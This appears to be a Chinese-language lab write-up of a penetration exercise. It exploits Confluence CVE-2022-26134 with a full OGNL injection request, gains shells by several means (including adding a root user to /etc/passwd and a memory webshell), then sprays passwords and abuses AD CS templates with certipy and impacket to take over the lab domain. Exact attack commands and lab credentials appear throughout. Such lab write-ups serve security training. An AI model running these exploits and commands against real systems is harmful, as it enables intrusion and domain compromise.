cyberstrikelab-lab11
字数 1521 2025-09-01 11:26:02
Confluence OGNL RCE (CVE-2022-26134) 漏洞利用与内网渗透实战
1. 目标环境概述
目标系统开放了以下端口:
- 22 (SSH)
- 3306 (MySQL)
- 8090 (Confluence HTTP)
- 8091 (备用HTTP)
Confluence版本为7.13.6,存在CVE-2022-26134漏洞(OGNL表达式注入远程代码执行)。
2. 漏洞验证与利用
2.1 漏洞验证
通过发送特殊构造的HTTP请求验证漏洞存在:
GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: 172.3.3.13:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
2.2 获取权限的四种方法
方法一:上线Vshell
- 生成正向连接的客户端
- 开启目标机器8877端口
- 本地开启HTTP服务上传文件
- 赋予可执行权限
- 运行客户端实现上线
方法二:使用MSF直接上线
使用Metasploit框架的对应模块直接获取会话
方法三:通过SSH添加用户
- 读取/etc/passwd文件
- 添加用户到文件尾部(示例内容):
r00t:x:0:0:root:/root:/bin/bash - 上传修改后的文件
- 使用添加的用户通过SSH连接
方法四:注入内存马
使用工具:CVE-2022-26134-Godzilla-MEMSHELL
3. 内网信息收集
发现内网还有两台机器:
- 10.10.10.5 (域控制器)
- 10.10.10.66
4. Confluence后渗透
4.1 数据库访问
- 定位Confluence配置文件
- 获取数据库凭据:
- 用户名:confluenceuser
- 密码:confdsdgfd
4.2 用户密码重置
- 将admin用户密码重置为123123
- 爆破cslab用户密码得到123456
- 访问cyberstrikelab空间成员表:http://172.3.3.13:8090/display/CYB/cyberstrikelab
5. 域渗透攻击
5.1 AS-REQ Roasting攻击
使用impacket-GetNPUsers工具:
impacket-GetNPUsers -dc-ip 10.10.10.5 -usersfile user.txt cyberstrike.lab/ -no-pass
结果分析:
- 大部分用户名不存在(KDC_ERR_C_PRINCIPAL_UNKNOWN错误)
- cslab用户存在但启用了预认证(未设置UF_DONT_REQUIRE_PREAUTH属性)
5.2 密码喷洒攻击
使用nxc工具爆破cslab用户密码:
nxc smb 10.10.10.66 -u cslab -p <字典路径>
爆破结果:
- cslab用户密码:qwe!@#123
- 本地管理员使用相同密码
5.3 获取SMB访问
使用impacket-smbexec连接:
impacket-smbexec cslab:qwe!@#123@10.10.10.66
后续操作:
- 开启3389端口
- 添加新用户
6. ADCS-ESC4攻击
6.1 探测易受攻击的证书模板
使用certipy-ad工具:
certipy-ad find -u 'cslab@cyberstrike.lab' -p 'qwe!@#123' -dc-ip 10.10.10.5 -vulnerable -stdout
权限分析:
- Full Control Principals: CYBERSTRIKE.LAB\Domain Admins和CYBERSTRIKE.LAB\Enterprise Admins
- Write Owner Principals: 同上
- Write Dacl Principals: 同上
- Write Property Enroll: 包含CYBERSTRIKE.LAB\Domain Computers
6.2 修改证书模板配置
certipy-ad template -u 'cslab@cyberstrike.lab' -p 'qwe!@#123' -dc-ip 10.10.10.5 -template 'DC' -write-default-configuration
6.3 ADCS-ESC1攻击
- 修改hosts文件避免超时
- 申请伪造证书:
certipy-ad req -u 'cslab@cyberstrike.lab' -p 'qwe!@#123' -target 10.10.10.5 -dc-ip 10.10.10.5 -ca 'cyberstrike-DC-CA' -template 'DC' -upn 'administrator@cyberstrike.lab'
- 获取administrator.pfx证书
- 使用证书获取TGT和NTLM Hash
- 进行Pass-the-Hash攻击获取域控权限
7. 关键工具与资源
-
Impacket工具集:
- GetNPUsers
- smbexec
-
Certipy-ad:
- 用于AD CS证书服务攻击
-
内存马注入工具:
-
参考文档: